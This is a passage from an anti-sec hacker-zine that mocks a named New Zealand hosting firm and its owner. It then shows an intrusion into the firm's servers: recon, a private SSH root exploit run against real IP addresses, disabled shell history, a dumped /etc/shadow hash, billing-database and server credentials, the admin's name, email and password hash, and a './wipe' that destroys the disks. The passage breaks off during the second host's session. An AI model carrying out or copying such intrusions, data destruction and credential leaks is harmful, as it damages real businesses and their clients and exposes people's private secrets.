mirror of https://github.com/fdiskyou/Zines.git
680 lines
26 KiB
Plaintext
680 lines
26 KiB
Plaintext
__ .__
|
|
_____ _____/ |_|__| ______ ____ ____
|
|
\__ \ / \ __\ | ______ / ___// __ \_/ ___\
|
|
/ __ \| | \ | | | /_____/ \___ \\ ___/\ \___
|
|
(____ /___| /__| |__| /____ >\___ >\___ >
|
|
\/ \/ \/ \/ \/
|
|
|
|
Some of you have seen a lot of casualties lately in the webhosting scene:
|
|
hosting companies being wiped and rm'd at the expense of their clients. While
|
|
some of this is collateral damage, we're about to show you, ladies and
|
|
gentlemen, that sometimes you aren't pwned because of who you host but what you
|
|
say.
|
|
|
|
Practice what you preach.
|
|
|
|
- Why SSANZ?
|
|
|
|
Owned by a kid who claims he can manage, secure and audit servers,
|
|
he offers a service that he clearly cannot provide, we are against that.
|
|
|
|
|
|
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
|
|
|
|
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
|
|
>>
|
|
>> Signature:
|
|
>>Server Systems Administration NZ | SSANZ
|
|
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
|
|
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
|
|
|
|
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:
|
|
|
|
|
|
>>Server Management - $25 Per Month
|
|
>>
|
|
>>- Full Management - Support, & 3rd Party Installs
|
|
>>- Monitoring - Included - up to 3 ports.
|
|
>>- Emergency Recovery
|
|
|
|
|
|
>>Server Security - $50
|
|
>>
|
|
>>- Initial Scan & Report
|
|
>>- Security Hardening & Security Installs/tweaks.
|
|
>>- IDS, Security Monitoring & mod_sec configured.
|
|
>>- Finishing Security Scan & SSANZ Custom Scans.
|
|
>>
|
|
>>
|
|
>>Emergency Server Recovery - $150
|
|
>>
|
|
>>- Recover Hacked Server Systems
|
|
>>- Recover deleted data
|
|
>>- ANTI-dDOS Services
|
|
>>- dDOS Investigation
|
|
|
|
Security Worries? Security Audits - 50% OFF <http://www.webhostingtalk.com/showthread.php?t=859795>:
|
|
|
|
>>Get your site/server audited to ensure your business data is
|
|
>>secure before you become a statistic.
|
|
>>
|
|
>>In the past 6 months, e-crime activity reports have increased by
|
|
>>45% due to the global economic recession.
|
|
>>
|
|
>>What is involved in a Full Security Audit?
|
|
>>
|
|
>>External Security
|
|
>>
|
|
>> * Scan for Shells/malicious scripts
|
|
>> * Scan for vulnerable web content ( permissions, RFI's )
|
|
>> * Scans for Vulnerable Server Services
|
|
>> * Vulnerable Ports
|
|
>> * Testing of TCP handling - dDOS test.
|
|
>> * Scan for Vulnerable PHP scripts/mods.
|
|
>> * Control Panel Security Audit ( external )
|
|
>> * Multiple Unique SSANZ Custom Scans*
|
|
>>
|
|
>>
|
|
>>Internal Security
|
|
>>
|
|
>> * Permissions/Ownership(s) Review
|
|
>> * Apache/Webserver Security
|
|
>> * User Account Security & binaries access audit
|
|
>> * Local RFI Exploits located/patched.
|
|
>> * System Binary Security Audit
|
|
>> * Firewall/IPTABLES Audit
|
|
>> * Bruteforce detection test & audit
|
|
>> * Root Access Authentication Audit
|
|
>> * Local PHP Functions Audit
|
|
>> * Control Panel Security Audit ( Internal )
|
|
>> * Kernel Security Audit
|
|
>> * Additional SSANZ Custom Scans/Audit*
|
|
|
|
We at anti-sec decided to give you a _FREE_ Full Security Audit!*
|
|
|
|
* `rm -rf /` is included.
|
|
|
|
|
|
anti-sec:~/pwn# ./map ssanz.net
|
|
|
|
IP: 66.197.143.133 ( osiris.ssanz.net )
|
|
WWW: Apache/2.2.11
|
|
SSH: SSH-2.0-OpenSSH_4.3
|
|
|
|
IP: 66.197.204.101 ( devil.ssanz.net )
|
|
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
|
|
SSH: SSH-2.0-OpenSSH_4.3
|
|
|
|
anti-sec:~/pwn# cd xpl/
|
|
|
|
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
|
|
|
|
[+] 0wn0wn - anti-sec group
|
|
[+] Target: 66.197.143.133
|
|
[+] SSH Port: 22
|
|
|
|
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
|
|
|
|
sh-3.2# export HISTFILE=/dev/null
|
|
|
|
sh-3.2# id
|
|
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
|
|
|
|
sh-3.2# uname -a
|
|
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
|
|
|
|
sh-3.2# head -n1 /etc/shadow
|
|
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
|
|
|
|
sh-3.2# w
|
|
03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78, 10.73
|
|
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
|
root pts/0 125.238.144.224 20:17 7:26m 13:18 13:18 htop
|
|
|
|
sh-3.2# pwd
|
|
/root
|
|
|
|
sh-3.2# ls -la
|
|
total 3008
|
|
drwxr-x--- 24 root root 4096 Jul 4 03:43 .
|
|
drwxr-xr-x 27 root root 4096 Jun 27 02:49 ..
|
|
-rw------- 1 root root 957 Jun 13 07:24 .accesshash
|
|
-rw------- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg
|
|
-rw------- 1 root root 15460 Jul 3 23:38 .bash_history
|
|
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
|
|
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
|
|
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
|
|
drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6
|
|
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
|
|
drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm
|
|
-rw-r--r-- 1 root root 18656 Feb 28 11:32 cmm.tgz
|
|
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
|
|
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
|
|
drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel
|
|
drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel
|
|
drwx------ 3 root root 4096 Jun 1 13:50 .cpobjcache
|
|
drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf
|
|
-rw-r--r-- 1 root root 430121 May 15 12:07 csf.tgz
|
|
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
|
|
drwx------ 2 root root 4096 Jun 1 13:54 .elinks
|
|
-rw-r--r-- 1 root root 1176672 Jul 4 03:40 error_log
|
|
-rw-r--r-- 1 root root 16 Jun 3 08:34 .forward
|
|
drwx------ 3 root root 4096 Jun 1 10:39 .gconf
|
|
drwx------ 2 root root 4096 Jun 1 10:39 .gconfd
|
|
drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem
|
|
drwx------ 2 root root 4096 Jun 1 13:55 .gnupg
|
|
drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1
|
|
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
|
|
-rw-r--r-- 1 root root 561 Jun 27 02:48 .htoprc
|
|
-rw-r--r-- 1 root root 8144 Jun 6 19:23 index.html
|
|
-rw-r--r-- 1 root root 4246 Jun 1 10:39 install.log.syslog
|
|
drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0
|
|
-rw-r--r-- 1 root root 0 Jun 27 09:21 iptraf-3.0.0.tar.gz
|
|
-rw-r--r-- 1 root root 0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
|
|
-rw-r--r-- 1 root root 0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
|
|
-rw-r--r-- 1 root root 575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
|
|
drwx------ 6 root root 4096 Jun 1 14:21 .MirrorSearch
|
|
-rw------- 1 root root 61 Jun 12 21:04 .my.cnf
|
|
-rw------- 1 root root 139 Jul 3 10:51 .mysql_history
|
|
-rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl
|
|
-rw-r--r-- 1 root root 264 Jul 2 21:43 .pearrc
|
|
drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp
|
|
drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html
|
|
-rw------- 1 root root 1024 Jun 7 19:50 .rnd
|
|
drwx------ 3 root root 4096 Jun 1 14:29 .spamassassin
|
|
drwx------ 2 root root 4096 Jun 2 06:41 .ssh
|
|
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
|
|
drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp
|
|
-rw------- 1 root root 0 Jun 7 22:01 .trustwavereqs
|
|
drw------- 2 root root 4096 Jun 3 08:18 whmrbackups
|
|
drw------- 3 root root 4096 Jun 10 08:25 whmrcorebackups
|
|
|
|
|
|
|
|
sh-3.2# cat .bash_history
|
|
htop
|
|
htop
|
|
p
|
|
htop
|
|
tail -f /var/log/secure
|
|
tail -f /var/log/secure
|
|
[snip]
|
|
nano highperformance.conf
|
|
service httpd restart
|
|
nano highperformance.conf
|
|
service httpd restart
|
|
nano highperformance.conf
|
|
nano httpd.conf
|
|
nano php.conf
|
|
ls
|
|
nano modsec2.conf
|
|
ls
|
|
[snip]
|
|
nano visit4cash.net.conf
|
|
cd ..
|
|
[snip]
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
ps -aux|grep -i HTTP|wc -l
|
|
w
|
|
bwm-ng
|
|
[snip]
|
|
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
|
|
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
|
|
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
|
|
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
|
|
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
|
|
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
|
|
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
|
|
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
|
|
[snip]
|
|
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
|
|
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
|
|
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
|
|
[snip]
|
|
service cups stop
|
|
chkconfig cups off
|
|
service nfslock stop
|
|
chkconfig nfslock off
|
|
service rpcidmapd stop
|
|
chkconfig rpcidmapd off
|
|
service bluetooth stop
|
|
chkconfig bluetooth off
|
|
service anacron stop
|
|
chkconfig anacron off
|
|
service avahi-daemon stop
|
|
chkconfig avahi-daemon off
|
|
service hidd stop
|
|
chkconfig hidd off
|
|
service pcscd stop
|
|
chkconfig pcscd off
|
|
[snip]
|
|
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
|
|
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
|
|
htop
|
|
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
|
|
[snip]
|
|
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
|
|
htop
|
|
[snip]
|
|
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
|
|
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
|
|
[snip]
|
|
wget http://www.logview.org/logview-install
|
|
chmod +x logview-install
|
|
./logview-install
|
|
rm -rf logview-install
|
|
|
|
sh-3.2# grep sec /etc/userdomains
|
|
affiliatesecrets.wecloak.info: wecloaki
|
|
infosecawareness.info: andlyssa
|
|
secproxy.info: secproxy
|
|
infosecawareness.andly.ssanz.net: andlyssa
|
|
greycloud.nakedinsects.com: greyclou
|
|
serversecuritynz.com: forumz
|
|
orac.nakedinsects.com: oracnz
|
|
infernal.nakedinsects.com: infernal
|
|
nakedinsects.com: ni
|
|
fluffy.nakedinsects.com: fluffy
|
|
quickclix.orac.nakedinsects.com: oracnz
|
|
seco39.ssanz.net: secossan
|
|
|
|
sh-3.2# lastlog | grep -v Never
|
|
Username Port From Latest
|
|
root pts/1 125.238.144.224 Fri Jul 3 20:27:03 -0400 2009
|
|
simmobim pts/0 118.69.80.114 Fri Jun 12 00:22:04 -0400 2009
|
|
mattss pts/1 118.90.48.0 Sun Jun 21 04:44:58 -0400 2009
|
|
etasmtco pts/0 189.31.24.129 Sat Jun 20 10:14:51 -0400 2009
|
|
|
|
sh-3.2# cd ~billing
|
|
sh-3.2# ls -la
|
|
total 301252
|
|
drwx--x--x 15 billing billing 4096 Jun 28 02:08 .
|
|
drwx--x--x 737 root root 20480 Jul 4 00:37 ..
|
|
lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs -> /usr/local/apache/domlogs/billing
|
|
-rw------- 1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
|
|
-rw------- 1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
|
|
-rw------- 1 billing billing 84475934 Jun 3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
|
|
-rw------- 1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
|
|
-rw-r--r-- 1 billing billing 24 May 27 2008 .bash_logout
|
|
-rw-r--r-- 1 billing billing 176 May 27 2008 .bash_profile
|
|
-rw-r--r-- 1 billing billing 124 May 27 2008 .bashrc
|
|
-rw------- 1 billing billing 17 May 27 2008 .contactemail
|
|
drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel
|
|
-rw-r----- 1 billing billing 0 Apr 4 06:32 cpbackup-exclude.conf
|
|
drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql
|
|
drwxr-xr-x 3 billing billing 4096 Nov 12 2008 cpmove.psql.1240007789
|
|
drwxr-xr-x 2 billing billing 4096 Apr 16 23:24 cpmove.psql.1243922290
|
|
-rw-r--r-- 1 billing billing 532304 Jul 4 03:45 error_log
|
|
drwxr-x--- 4 billing mail 4096 Jan 19 21:39 etc
|
|
drwxr-x--- 2 billing nobody 4096 May 27 2008 .htpasswds
|
|
-rw-r--r-- 1 billing billing 7 Nov 12 2008 .lang
|
|
-rw------- 1 billing billing 15 Jun 28 02:07 .lastlogin
|
|
drwxrwx--- 10 billing billing 4096 Jul 2 21:43 mail
|
|
drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla
|
|
drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp
|
|
drwxr-x--- 24 billing nobody 4096 Jun 28 02:55 public_html
|
|
drwx------ 4 billing billing 4096 Jun 7 21:53 ssl
|
|
drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp
|
|
drwx------ 2 billing billing 4096 May 27 2008 .trash
|
|
lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www -> public_html
|
|
-rw-r--r-- 1 billing billing 658 May 27 2008 .zshrc
|
|
|
|
sh-3.2# cd www/
|
|
|
|
sh-3.2# ls
|
|
admin banned.php configuressl.php domainchecker.php init.php logout.php postinfo.html templates
|
|
viewticket.php whois.php
|
|
affiliates.php billing contact.php downloads installmingchowping modules _private templates_c _vti_bin
|
|
aff.php cart.php creditcard.php downloads.php knowledgebase.php networkissues.php register.php tutorials.php _vti_cnf
|
|
announcements.php cgi-bin dbconnect.php htaccess.txt lang networkissuesrss.php serverstatus.php upgrade
|
|
_vti_inf.html
|
|
announcementsrss.php clientarea.php display.php images libs order.php status upgrade.php _vti_log
|
|
announcements.xml configuration.php dl.php includes link.php passwordreminder.php submitticket.php viewemail.php _vti_pvt
|
|
attachments configuration.php.new dologin.php index.php login.php pipe supporttickets.php viewinvoice.php _vti_txt
|
|
|
|
sh-3.2# cat configuration.php
|
|
<?php
|
|
$license="93881365561d";
|
|
$db_host = "localhost";
|
|
$db_username = "billing_billusr";
|
|
$db_password = "X2qL6:qWCCb6";
|
|
$db_name = "billing_billing";
|
|
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
|
|
$templates_compiledir = "templates_c/";
|
|
?>
|
|
|
|
sh-3.2# mysql
|
|
Welcome to the MySQL monitor. Commands end with ; or \g.
|
|
Your MySQL connection id is 11021136
|
|
Server version: 5.0.81-community MySQL Community Edition (GPL)
|
|
|
|
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
|
|
|
|
mysql> use billing_billing;
|
|
|
|
Reading table information for completion of table and column names
|
|
You can turn off this feature to get a quicker startup with -A
|
|
|
|
Database changed
|
|
|
|
mysql> show tables;
|
|
+----------------------------+
|
|
| Tables_in_billing_billing |
|
|
+----------------------------+
|
|
| mod_ipmanager |
|
|
| mod_ipmonitor |
|
|
| tblaccounts |
|
|
| tblactivitylog |
|
|
| tbladdons |
|
|
| tbladminlog |
|
|
| tbladminperms |
|
|
| tbladminroles |
|
|
| tbladmins |
|
|
| tbladminsecurityquestions |
|
|
| tblaffiliates |
|
|
| tblaffiliatesaccounts |
|
|
| tblaffiliateshistory |
|
|
| tblaffiliatespending |
|
|
| tblaffiliateswithdrawals |
|
|
| tblannouncements |
|
|
| tblbannedemails |
|
|
| tblbannedips |
|
|
| tblbillableitems |
|
|
| tblbrowserlinks |
|
|
| tblcalendar |
|
|
| tblcancelrequests |
|
|
| tblclientgroups |
|
|
| tblclients |
|
|
| tblconfiguration |
|
|
| tblcontacts |
|
|
| tblcredit |
|
|
| tblcurrencies |
|
|
| tblcustomfields |
|
|
| tblcustomfieldsvalues |
|
|
| tbldomainpricing |
|
|
| tbldomains |
|
|
| tbldomainsadditionalfields |
|
|
| tbldownloadcats |
|
|
| tbldownloads |
|
|
| tblemails |
|
|
| tblemailtemplates |
|
|
| tblfraud |
|
|
| tblgatewaylog |
|
|
| tblhosting |
|
|
| tblhostingaddons |
|
|
| tblhostingconfigoptions |
|
|
| tblinvoiceitems |
|
|
| tblinvoices |
|
|
| tblknowledgebase |
|
|
| tblknowledgebasecats |
|
|
| tblknowledgebaselinks |
|
|
| tbllinks |
|
|
| tblnetworkissues |
|
|
| tblnotes |
|
|
| tblorders |
|
|
| tblpaymentgateways |
|
|
| tblpricing |
|
|
| tblproductconfiggroups |
|
|
| tblproductconfiglinks |
|
|
| tblproductconfigoptions |
|
|
| tblproductconfigoptionssub |
|
|
| tblproductgroups |
|
|
| tblproducts |
|
|
| tblpromotions |
|
|
| tblquoteitems |
|
|
| tblquotes |
|
|
| tblregistrars |
|
|
| tblservers |
|
|
| tblsslorders |
|
|
| tbltax |
|
|
| tblticketbreaklines |
|
|
| tblticketdepartments |
|
|
| tblticketescalations |
|
|
| tblticketlog |
|
|
| tblticketmaillog |
|
|
| tblticketnotes |
|
|
| tblticketpredefinedcats |
|
|
| tblticketpredefinedreplies |
|
|
| tblticketreplies |
|
|
| tbltickets |
|
|
| tblticketspamfilters |
|
|
| tbltodolist |
|
|
| tblupgrades |
|
|
| tblwhoislog |
|
|
+----------------------------+
|
|
80 rows in set (0.00 sec)
|
|
|
|
mysql> select name,ipaddress,hostname,username,password from tblservers;
|
|
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
|
|
| name | ipaddress | hostname | username | password |
|
|
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
|
|
| Osiris | 66.197.143.133 | Osiris.ssanz.net | ssanz | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co= |
|
|
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
|
|
| Devil | 66.197.204.101 | devil.ssanz.net | root | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A== |
|
|
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
|
|
3 rows in set (0.00 sec)
|
|
|
|
mysql> select firstname,lastname,email,username,password from tbladmins;
|
|
+-----------+----------+-----------------+----------+----------------------------------+
|
|
| firstname | lastname | email | username | password |
|
|
+-----------+----------+-----------------+----------+----------------------------------+
|
|
| Logan | Douglas | Logan@ssanz.net | Admin | c6df529826cf16ac5bedb424d8ac972b |
|
|
+-----------+----------+-----------------+----------+----------------------------------+
|
|
1 row in set (0.06 sec)
|
|
|
|
mysql> quit
|
|
Bye
|
|
|
|
|
|
sh-3.2# df -h
|
|
Filesystem Size Used Avail Use% Mounted on
|
|
/dev/sda5 2.0G 477M 1.4G 26% /
|
|
/dev/sda8 875G 147G 684G 18% /home
|
|
/dev/sda3 9.7G 6.8G 2.5G 74% /usr
|
|
/dev/sda2 9.7G 7.0G 2.3G 76% /var
|
|
/dev/sda1 99M 23M 72M 24% /boot
|
|
/dev/sda6 996M 64M 881M 7% /tmp
|
|
tmpfs 3.9G 0 3.9G 0% /dev/shm
|
|
/dev/sdb1 459G 163G 273G 38% /backup
|
|
|
|
sh-3.2# ./wipe
|
|
|
|
sh-3.2# df -h
|
|
Filesystem Size Used Avail Use% Mounted on
|
|
/dev/sda5 64Z 64Z 1.5G 100% /
|
|
/dev/sda8 64Z 64Z 729G 100% /home
|
|
/dev/sda3 64Z 64Z 3.0G 100% /usr
|
|
/dev/sda2 64Z 64Z 3.0G 100% /var
|
|
/dev/sda1 16Z 16Z 0 100% /boot
|
|
/dev/sda6 64Z 64Z 933M 100% /tmp
|
|
tmpfs 3.9G 0 3.9G 0% /dev/shm
|
|
/dev/sdb1 64Z 64Z 296G 100% /backup
|
|
|
|
sh-3.2# exit
|
|
exit
|
|
|
|
|
|
-----------------------------------
|
|
|
|
osiris [ DOWN ]
|
|
devil [ UP ]
|
|
|
|
-----------------------------------
|
|
|
|
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
|
|
|
|
[+] 0wn0wn - anti-sec group
|
|
[+] Target: 66.197.204.101
|
|
[+] SSH Port: 22
|
|
|
|
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
|
|
|
|
sh-3.2# export HISTFILE=/dev/null
|
|
|
|
sh-3.2# id
|
|
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
|
|
|
|
sh-3.2# uname -a
|
|
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
|
|
|
|
sh-3.2# head -n1 /etc/shadow
|
|
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
|
|
|
|
sh-3.2# w
|
|
04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68
|
|
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
|
root pts/0 125.238.144.224 20:18 7:51m 6:38 6:38 htop
|
|
|
|
sh-3.2# pwd
|
|
/root
|
|
|
|
sh-3.2# ls -la
|
|
total 1232
|
|
drwxr-x--- 23 root root 4096 Jul 4 04:06 .
|
|
drwxr-xr-x 25 root root 4096 Jun 29 14:33 ..
|
|
-rw------- 1 root root 957 Jun 13 05:20 .accesshash
|
|
-rw------- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg
|
|
-rw------- 1 root root 7258 Jun 30 10:03 .bash_history
|
|
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
|
|
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
|
|
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
|
|
drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6
|
|
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
|
|
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
|
|
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
|
|
drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel
|
|
drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel
|
|
drwx------ 3 root root 4096 Jun 12 00:17 .cpobjcache
|
|
drwxr-xr-x 2 root root 4096 Aug 21 2006 cse
|
|
-rw-r--r-- 1 root root 12207 Oct 10 2008 cse.tgz
|
|
drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf
|
|
-rw-r--r-- 1 root root 431490 Jun 5 10:52 csf.tgz
|
|
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
|
|
drwx------ 2 root root 4096 Jun 12 01:51 .elinks
|
|
-rw-r--r-- 1 root root 16 Jun 13 15:33 .forward
|
|
drwx------ 3 root root 4096 Jun 11 23:59 .gconf
|
|
drwx------ 2 root root 4096 Jun 11 23:59 .gconfd
|
|
drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem
|
|
drwx------ 2 root root 4096 Jun 12 01:53 .gnupg
|
|
drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1
|
|
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
|
|
-rw-r--r-- 1 root root 561 Jun 12 23:31 .htoprc
|
|
-rw-r--r-- 1 root root 4239 Jun 12 00:01 install.log.syslog
|
|
drwx------ 6 root root 4096 Jun 12 02:33 .MirrorSearch
|
|
-rw------- 1 root root 37 Jun 12 02:11 .my.cnf
|
|
drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6
|
|
-rw-r--r-- 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz
|
|
-rw-r--r-- 1 root root 264 Jun 23 00:23 .pearrc
|
|
drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp
|
|
drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html
|
|
-rw------- 1 root root 1024 Jun 12 02:50 .rnd
|
|
drwx------ 3 root root 4096 Jun 12 02:41 .spamassassin
|
|
drwx------ 2 root root 4096 Jun 22 09:11 .ssh
|
|
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
|
|
drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp
|
|
drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi
|
|
|
|
sh-3.2# cat .bash_history
|
|
sh hninst.sh
|
|
passwd
|
|
fdisk -l
|
|
exit
|
|
w
|
|
history
|
|
screen -ls
|
|
screen -r 2785.pts-0.devil
|
|
exit
|
|
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
|
|
[snip]
|
|
csf -a 125.238.144.110
|
|
exit
|
|
cd /home
|
|
ls
|
|
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
|
|
[snip]
|
|
wget http://visit4cash.net/mainfiles.tar.gz
|
|
mv mainfiles.tar.gz /home/visit4ca/public_html
|
|
cd /home
|
|
cd visit4ca
|
|
cd public_html
|
|
ls
|
|
tar zxvf mainfiles.tar.gz
|
|
[snip]
|
|
csf -d 89.165.50.38
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 89.165.50.38
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 89.165.50.38
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 89.165.50.38
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 89.165.50.38
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 89.165.50.38
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 89.165.50.38
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 89.165.50.38
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 89.38.206.233
|
|
csf --restart
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
csf -d 118.94.59.33
|
|
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
|
|
[snip]
|
|
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
|
|
